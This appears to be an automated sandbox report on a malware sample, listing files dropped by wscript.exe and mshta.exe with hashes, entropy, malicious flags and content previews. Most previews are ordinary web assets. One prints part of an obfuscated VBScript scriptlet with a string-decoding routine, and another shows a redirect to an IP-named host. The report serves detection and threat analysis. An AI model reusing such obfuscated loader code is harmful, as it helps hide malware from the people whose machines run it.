                                                                                                                                                                                                                                Preview:.PNG........IHDR.......D....._..v....pHYs............... .IDATx..I.$[r..7;.q...M5>v.#....PS.6..hX.Z......z'}..k'}.-.h.E.F. ...").."..d.c..W./.;D......1...o.73....~.;.{....._.~!p!......s....$ .2.e.@.0...E...bu"ph....F....+.+}Ph7...C ..L.a0W.o$.....H.P. ?F ....3..:a...I.4.....1....@.@..7.bm&.m..n..I..2..i........T......',T......>.(...8. ..WY.`4.f..Y=....5.j.]].*.;......K......H...$..3.........u~..].z.dh9k...C..G9..,u~..*......e;T.-S-..:..}$#..........-0.y........o*^O.l.x..a{.k....6rhNd.|X.m..%yx.....+.B....F....S..|....?,...;.$....M..<.q..f\n.....z:.....vms..9T..~5o.gS.....3k~2.J..c..........o.r~..y.o....>..e.gy......r..v..u.$<..rm..5..H.o).B....C..a=_.\ y....k..^{.{.t0...A.3..=r...V..Z....x.........(.u.`.3....7...].V7P@ .A.....Y.......D.U. Y@g.0..!.+b?.#(.>Q.J.H..>Kf.tM....FBX..<.= .b.w.<...xA..g....N..{..{....d/..8..!.. a.~.A......A...<H...*..A....zP....lc2.W....AB...v..b..7.?*..m..R....![|....cF.....kY/!..P.........S.7..o\.a.......Y=...
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):357
                                                                                                                                                                                                                                Entropy (8bit):5.209832565354849
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
                                                                                                                                                                                                                                MD5:8D156A3026840157CA292D51F52152BC
                                                                                                                                                                                                                                SHA1:6314B3E015735F52A605CA45608CD14F95FEF6A0
                                                                                                                                                                                                                                SHA-256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
                                                                                                                                                                                                                                SHA-512:A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):224845
                                                                                                                                                                                                                                Entropy (8bit):7.994739990069494
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:amrlaGF4bFMzu5ID2kO2gCmZ3Am73ouj/1C:a2lRF4Szu5IDHc3Am73oGdC
                                                                                                                                                                                                                                MD5:9478D604A860A7733917DC1539CDE3C5
                                                                                                                                                                                                                                SHA1:E79769846947C43439A80E490C6861E9AC73CC19
                                                                                                                                                                                                                                SHA-256:B904296E622551B280A830DF6F29909EA7A86621E23C711A9CD0FC23F9A75B83
                                                                                                                                                                                                                                SHA-512:4334A97DE3A736EB542F78C1C3C9A1C2F9FD30B41D6806CC836C0E547A8404876E676492DD80411B278A90A1CA0A3B6476451E8979AE52A271D688753F775675
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..m.$Wy..{NfV.}...BH-@-lK.c..4~a#F-l....0l...a@....e^f......_v.`k....<....f$.7..].6f...a0......$...v.z.<g?...........q..2.y.sN..<....<...j..c....Fb..4&.=.OQ....E.Q.q>].-a..".'.I..b.:..ov.E.5}....l-.ef..5...td.....}.|../..#....u....z..2...j.}.....x..MO*.-.......6.T.YP9.....&.G.*y..1.o.Z..v.;?..U.<..r.Ds..&.,.=..JKYG...u..u.a2j=..g.E..v.FZ...W.G....fv?)s.H_,z=..Y.TiD.....J....j.z....#U.H.<..T..e....Ni..`...W.,Rp.$\.hJ..$....x..P.u..3I.E.k.>.u_Xc...+.|;...k..~P..U.o.e..e...F....E.y..].....$O/-~l..PD.<].......,.-"..O...~.....Pi'gU"...N..Y.}....pE.._D..Mf.\.$R..P..L.M<...Y.Kk.^.Ut..Zo..'..n....u*......k...@../[.S.Uy......YX......E.."y..{.z7-.nE.W.../e>.1...Qz..q...y(..U5....x.Ey..h...D1E...s..^.u\.y...t1S.$&k]...J....K}.q..x..$..F3+?....0.5.Z.tB..k........ZN.iQ..T..4V[E...=.^....{.*<...-V....I.<ON..YZ.*.&.U.me..Z.$L!..V+..:.o=6..:uov5.h.r.'.zS.i.....W........<{./k9.....
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7359
                                                                                                                                                                                                                                Entropy (8bit):7.930889120298135
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSTlH2AgwJpC8EbBb0hFfoywVUNub9HDpclnoHhiX:4T/gifE1OxwVUNl
                                                                                                                                                                                                                                MD5:6103CD3C87A8B6BE092FB8571DA0FA4E
                                                                                                                                                                                                                                SHA1:9CB61811CD4DA849D5E734F0581101A9D7BDAB0F
                                                                                                                                                                                                                                SHA-256:05B2339E130BBA9F5700602565BFBE9F75CAEA3D95E7D113887159E38479A62D
                                                                                                                                                                                                                                SHA-512:08ADC1D8F8E009D7700E6C77FAC50CEAE4C5904B755D61603F407F775439FBF68C4410B3D2ECC22A6A70E1B625777E19FFA553C194DB970AF9022A27ED1929F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs................qIDATx...?t.X.....s..._9~.x.L.!l...)....%e..N?,.{....J.>N.........9...t_!....[....9'g..n.....""""""""""""""""""..D,:.~>..e.FY..K.. ..(...QRt.Gt.......=(............g\..S....Y....A.D...}.....K..qMSa.2....t1t...A}..A..@.(...r............- ..8y..4$K.\..JU..`.M..Q ...D...ZU.....m..|"....4.Yc..hBG..-..O..yp..~.!`.1.lJ....Z..D...Q..(G.Jq......t..D........r..J...q....#...Z..S...(...<..*.i..3.4..(.I.Q.K..^T..,...D..@...z7.c.AN....}.gt...AN...T.....g.@.4...."r'...t3W...Y..sr".N.YYE{.a.3..`0.).F.$].2......o.r.d...#.r.....g.R...Q$J.@...P......>.I.(Z.q...U....D.`."T..8.?.j....-.........;.....h.....Q....1P...h)..@.4`-P...hi.*.}Kt..DKm.l.7.@W8..h..M.wx......(G. "...>..y..3.e..}"Z,..-....:.HSCD...[..5..\.....U}w.t...X.CD.P<b...|[.hyH..<.]...(U.k.:......K..K...6.....bM...b..e..].....D.........D)$]..].....RH.,.K1...b#...`.;QZ1.2 T.....@'...:Q.0.2..N...t..`..e...(...D..@'...:Q.0.2..N...t..`..e...(...D.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11023
                                                                                                                                                                                                                                Entropy (8bit):7.958484350052868
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSHKdFU5BjAPP5ea9q4wgDsnKB+fVxfWT8igARItszv6s6v6v6v6nvJZ6mRzZeKE:4qdFmtAPmnKBAVxIhiXiiinxrwhuswE
                                                                                                                                                                                                                                MD5:15192F94DB7354DA176CA9200FDD57AA
                                                                                                                                                                                                                                SHA1:BA39A813EA8F7FD63100EAD2D1125423F4C6BC08
                                                                                                                                                                                                                                SHA-256:F5D775A23BC44B23C2ABD28FAF1F5F0CBA4CCD4BC744F946BA094C386041B284
                                                                                                                                                                                                                                SHA-512:1EF68A031CF0F92455EEDC034CD14450D6E4DC68C025B334CE62D9D8B81AEAD322BCCA4F9B8272BF70C4DFAAF18644D0FD80D0F2AF23F343A36E9C1C3ADB7FCA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs............... .IDATx..]l.W....H},.%./.";.....c.iK....S.....X.."50.....H..1.......t"..b7......D.`.^[T&A'......vv#.._DI..."..C.%V...*~.y~..........s.=. .. .. .. .. .. .. .. .. .. .r........=1.<..0...{8....A.........._.`!.!\...*v..QrB...^..>.....$f..D...0!@..5...@..A.....6Q....dp....&t.......:..-V=.".0.9..Vc.L..P`8<....8....b^..*...*.U......8Q..\....4..d....y.q..B(.....Y8.......... Rhf...........?..f........QF.w.K.~.-....H..a.f@......(<.B..."x..p#.S0`....a...t...c...L..P.kq..\..3....".0`.....QY.C"'...+.g=F_..a.9A.......w.-'+...y....!.._..:.{<.u$..'..0\..S....YKB........`p`..w[...d..#.H..Q@...A...1.=.B....f.#."'4..K.'.2..&....!."..x\|....z...N.Dqa..T.nX.?`..d..D...f...6.W.{.$t.(.8.X....P$..zt.....`..U..zuC=:...Q....3....D....=..L.e.:..rR#. ......J+...x.xrV%. ......7..i.....i.Q.0..p........m}....\.P.]...vw.+D.D.a.+...+.(....(9. x.........'...`.O.}.f....N.6...jVS...9%. ....W\.)h.}..w^kD.D^.A0.t..v..#..;........A.6.h..\S..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):42416
                                                                                                                                                                                                                                Entropy (8bit):7.989150003310406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:kfh0yapmFPej8Dx+THxWJdj2sdsBTFT/UX6B82/V8TmkR4eK:68EejDBTLdmQ
                                                                                                                                                                                                                                MD5:2F17AD57ECBFC45AC503ED546B55D656
                                                                                                                                                                                                                                SHA1:C1C907BF9F1B18E40C9BED81DBBE864C38ED2906
                                                                                                                                                                                                                                SHA-256:CD22A7CB21E98FACF0FD0940A03687CE1EE26B02C5ED55AA4FA4ECF747C15070
                                                                                                                                                                                                                                SHA-512:EDE5FABEBEC983E64C7B74511B5C512CC1D1EC6EA160E9CEA3285AEE5F439B084C160072E7CFCCE711281770C7F499E5351E61462825F3B2FB5906EC9FCD4593
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.e.]....}....UWWWU.....n$!..-1.V....c.l.,91.X,.0.q..B.b'`.8.....b.$...m$.0.!..ZBc.]U].{..;.../...s_.z.....[..3..o......<..V..o..Q8!..|.?.W.-.G0................s.<.....%......?..C.F(....*....w.C.=.y..Or........7......<......g;xI..$.............8..%...zT.o..5.'..s.=...@.K..K...&......=.=...t%........%,An.'.g..Or...t....b^>.@.G..{S.(.m.........6./u3..).....}.}..t@.3.EX|yA!U..#.z..../q...:.3(...)....@"..x.[t@.7..r......._....Oc.....X.`.4../uK..A........?f...R..^9t.e.2..E.)bU.uA........>.yZ;..'..W.+....5h..%..i..p....1....'..2..f...b...z..7.".*..A'3t2...~.4.|..,}...RP.....!Y[...?.7..C....?.ZqUZ.....mO..G......S.....{..>q..v@}JBpU-...F........7..'.;.....w..........,..G.]...<..96..Oh.}........}~..1.V..{-2(.{...wQ..u,....8q....:.R?...[^.i.s.=.c..OY.....E....v.......A..~..!..}.O...7....v.a..>....%f}.......6...4...cX..og.....,^..../ls.O.....9.. ............#Ob..F....gz.f....'Y.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2261)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2353
                                                                                                                                                                                                                                Entropy (8bit):5.448764768129052
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:ciq0LYM5tgKIXBb6//dYuQR/UbDZIweqbDQrEkIeKpY7vhjRIovV8UWfmFp966Ry:XEMBBA/eIw01hjH8BmFp9Yka75xe+fjr
                                                                                                                                                                                                                                MD5:0BC0C33CF0F691D7D609885C8EBC555A
                                                                                                                                                                                                                                SHA1:58F53A88A4847BB490F9F8E973469725A783C3EB
                                                                                                                                                                                                                                SHA-256:D61D32EA479952154FE6C772E076C792BB61FF26E7B7E4EA7C73D1D7BD727DD5
                                                                                                                                                                                                                                SHA-512:B56AB9AF223803C870A6290263FF32ED8A54B8602FE98D7ED58072C6C1B3DEB3B69F1A2D7B00020884DA6864DC3ABF6751780F9E4725D45C6041A93851BE0914
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[703],{78748:(t,e,i)=>{i.r(e),i.d(e,{default:()=>x});var n,r,o=i(47169),a=i(8821),l=i(85169),s=i(82248),c=i(46647),p=i(32735),d=i(56875),f=p.createElement,g=function(t){(0,s.Z)(i,t);var e=(0,c.Z)(i);function i(){return(0,a.Z)(this,i),e.apply(this,arguments)}return(0,l.Z)(i,[{key:"render",value:function(){var t=this,e=this.props.publication,i=e.titleBanner,n=e.titleAlign,r=e.bgColor,o=void 0===r?null:r,a=e.titlePosition,l=e.children,s=e.borderLess;if(!l)return!1;var c=a&&"Footer"===a;return f(u,{bgColor:o},f(m,{borderLess:s},i&&!c&&f(h,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i)),l.map((function(e){return f("div",{key:e._id},t.props.renderComponent(e))})),i&&c&&f(C,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i))))}}]),i}(p.Component),u=d.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-1qaorq1-0"})(["",";"],(function(t){var e=t.bgColor;return e&&"backgroun
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (315)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                Entropy (8bit):5.551639931235917
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:+Ep1Jzp1J+rmWN3Nis+tFggO9leGKW+dRcuV6k0mgzVTwEWIus27ALErv3uL1QOb:+pmKdmjYeGKWMdI5LErveLy8
                                                                                                                                                                                                                                MD5:E2141C717ACED19353C843E121FB8617
                                                                                                                                                                                                                                SHA1:AD42B5055A1B762110695CECC8E228221548AE79
                                                                                                                                                                                                                                SHA-256:AD9E2DC2C63617447BD5D59159E971451A6C31AC4C59053902C1FFD525118AFF
                                                                                                                                                                                                                                SHA-512:B643292EF1FAD1249BA7509E29AEAB636A0D13D22CDE082D1E9D9D77718966B0D16501F7F527FD125194A472D7E3B636CC3837EF317AC8479C16F5455CC2CD2D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5335],{99838:(e,n,_)=>{_.r(n),_.d(n,{default:()=>t});var r=_(32735).createElement;const t=function(e){var n=e.publication,_=e.renderComponent;return n?n.children.map((function(e){return r("div",{key:e._id},_(e))})):null}}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-zion-content.6b35577201554a5b827f.js.map
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5939)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6033
                                                                                                                                                                                                                                Entropy (8bit):5.480942188804171
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:ndfmCzL5yEifbddhECXsfLW1UJeFyB75iJWn/hEV/me1ksrfF7BoQQGkbq7a:ndfmCzL5tiTddWCXsfLW1UEoB3EVM0f2
                                                                                                                                                                                                                                MD5:9F0E2F23F8E77696032795CBECCDC012
                                                                                                                                                                                                                                SHA1:E6A4D1FCED1C4599B0AC3699EF5342239A63B786
                                                                                                                                                                                                                                SHA-256:7B0D5B9C0CB2A660345E621A21628D357EACE9B13D37B6606235A81422381FCC
                                                                                                                                                                                                                                SHA-512:9894E933F10CCC9509485F23CD0581151717233A08EBEE8CB6000299B265F4D759532A26E05AF26D94CDAC303DB001559E91C29E48405EBD2DA2ECEB118C5DBE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2205],{3337:(r,t,a)=>{a.r(t),a.d(t,{acomTheme:()=>x,default:()=>p});var l=a(20011),i=a(37755),e=a(32735),o=a(22538),d=a(89504),s=a(21277),F=a.n(s),g=a(56875),h=a(38664),C=e.createElement,x=(0,i.Z)((0,i.Z)((0,i.Z)({},h.O9),h.Dx),{},{mainColors:h.nA,supportColors:h.eP,baselineColors:h.KR,systemColors:h.EU,complementaryColors:h.Ej,ameColors:h.Yj,typography:h.cp,fontFamily:"Helvetica,Arial,sans-serif;",shadow:{floatBasket:"0 0 12px 0 rgba(0,0,0,0.25)",box:"0 6px 20px -1px rgba(0,0,0,0.08);"},border:"1px solid #CCCCCC"});const p=(0,o.EN)((function(r){var t,a=function(r){var t,a=(0,d.useQuery)(F(),{variables:{path:null===r||void 0===r?void 0:r.pathname},fetchPolicy:"cache-only"}).data,l="texto claro"===(null===a||void 0===a||null===(t=a.skin)||void 0===t?void 0:t.textLight)?"#fff":null;return(0,i.Z)((0,i.Z)({},null===a||void 0===a?void 0:a.skin),{},{fontColor:l})}(null===(t=r.history)||void 0===t?void 0
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3247
                                                                                                                                                                                                                                Entropy (8bit):5.459946526910292
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                                                MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                                                SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                                                SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                                                SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32138)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):105873
                                                                                                                                                                                                                                Entropy (8bit):5.6043930283186105
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:NZOfIApQCjPBY7crnrhtnywq9Av6LJ0KOPqrCvBM:WIAB4dYvBM
                                                                                                                                                                                                                                MD5:FBCE26D4D5C87F37F7AE7F8255048F88
                                                                                                                                                                                                                                SHA1:59B8F83022678396DF309833187E7ED3EF3625E3
                                                                                                                                                                                                                                SHA-256:BBEABFF0CA4BBCDF82F6398B5D5313C204ECE66CF8B8CAA563032A5354307A74
                                                                                                                                                                                                                                SHA-512:6DDF9DA6D2C3C45003B8BD7E16F00F0B25DF46D9608470D3B9A9B9969BA52C2AD71F301DE7F7B30C66C0BC80116C8B57D9C1E286415A9A257FCBAE3F7F475E49
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):503867
                                                                                                                                                                                                                                Entropy (8bit):5.512590647226025
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:VA+dtQf2iTXNrXIhgKQ0XCS77EDIFfuZBuXKl1T2EFi+B:qTfD6H/EauZBual1T2Ej
                                                                                                                                                                                                                                MD5:14D570E2B18EDB45C60D292320C92D9F
                                                                                                                                                                                                                                SHA1:F33FB3E83C6894F590C8C9348B11FAC2E6827EE8
                                                                                                                                                                                                                                SHA-256:04D85FDAA240E9C6964C1B3AFE75B8802720A8D9A98E6C35F346F599B1113AF4
                                                                                                                                                                                                                                SHA-512:43DD920A68256864EE489B222AC5823F5EB597071E7832D935257E1D484E84146C09BEEEEE384F38CEA25FCF489BED02AB76DE420CD66E9131AC445075F53A69
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ca,ea,ja,xa,za,Ea,Ga,
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (2989), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26056
                                                                                                                                                                                                                                Entropy (8bit):5.945963325885817
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:U4FHorBL8OkYG5YFB888YqR5ENMthRDyEuAOjMuO06JWzFWMFGPkytyz3:arBL8OqqjMthRDyR406JWzJ+Q3
                                                                                                                                                                                                                                MD5:CC5FFDBC083E4416BE931A37DF745C6A
                                                                                                                                                                                                                                SHA1:421D6B81B09BBFF3376A077483F5F3E55C4074CF
                                                                                                                                                                                                                                SHA-256:1293BBCF890D2E5BFE411DC8EE99B95C521D852A8D0E5D3ACE5C6D17F901087F
                                                                                                                                                                                                                                SHA-512:E4125E7E127F4A00340E3018881D3D17406CFD78D48C00A8266D1EDE9883E2AB324D6B2123B9C43350B110FBA44F24D030B9C4405544553DF9A8D7ABE9A578B1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function deJgOUzb3revx0ry_17(cj9L2wLZtR7_26, qc0SLwSYS5Gow_1)..Dim UrywOkdMwtnqDeEG_27, iqTYh9gNHizyz1_28..UrywOkdMwtnqDeEG_27 = asc(Mid(cj9L2wLZtR7_26,1,1)) - 65..cj9L2wLZtR7_26 = Mid(cj9L2wLZtR7_26,2,Len(cj9L2wLZtR7_26)-1)..Dim nHUIDjbbu6e0kxKl3ph0_29..Dim PT2SPrp2miTP3RHlw_30..iqTYh9gNHizyz1_28 = "".. while (Len(cj9L2wLZtR7_26) > 0).. cya8YbUSUot6KWycdG_80 = Mid(cj9L2wLZtR7_26,1,1) .. nHUIDjbbu6e0kxKl3ph0_29 = (asc(cya8YbUSUot6KWycdG_80)-65) .. PT2SPrp2miTP3RHlw_30 = (asc(Mid(cj9L2wLZtR7_26,2,1))-65).. iqTYh9gNHizyz1_28 = iqTYh9gNHizyz1_28 & (Chr(( (nHUIDjbbu6e0kxKl3ph0_29) * 25 + PT2SPrp2miTP3RHlw_30 - UrywOkdMwtnqDeEG_27 - qc0SLwSYS5Gow_1))) .. cj9L2wLZtR7_26 = Mid(cj9L2wLZtR7_26,3,Len(cj9L2wLZtR7_26)-2).... wEnd.. .. deJgOUzb3revx0ry_17 = iqTYh9gNHizyz1_28..end function........const qc0SLwSYS5Gow_1 = 92..ycnp7lIL4zylgcRmmZK_2 = deJgOUzb3re
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (39875)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):409164
                                                                                                                                                                                                                                Entropy (8bit):5.572679295196754
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:Px7jMGmBYnsbQBwZ1HcRCrGRe5NAaa0Mf3/eNO9:RMpbOw7Hc8Se5a5
                                                                                                                                                                                                                                MD5:8370233C3F427C86BA0807A87A325DA6
                                                                                                                                                                                                                                SHA1:5848C95DC2DF51A8D5040191A1C41BE80CD1D8A8
                                                                                                                                                                                                                                SHA-256:D53E32C7E7AFB5A979FDFF5B2585439D64BDED3003FA25EB339947B658987342
                                                                                                                                                                                                                                SHA-512:C4A446095DDE204D8EB799A5BF405511142DB39A6D817C10BDE8D85A9E3C803AF60DD78D0049F943189D353F4850B73EF542B1E9B98932AC23532101FDB09EC9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"204",. . "macros":[{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"screen"},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.id})}catch(a){}})();"]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"valorSacola"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.department})}catch(a){}})();"]},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQu
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (26979)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):27033
                                                                                                                                                                                                                                Entropy (8bit):5.157851706922435
                                                                                                                                                                                                                                Encrypted:false
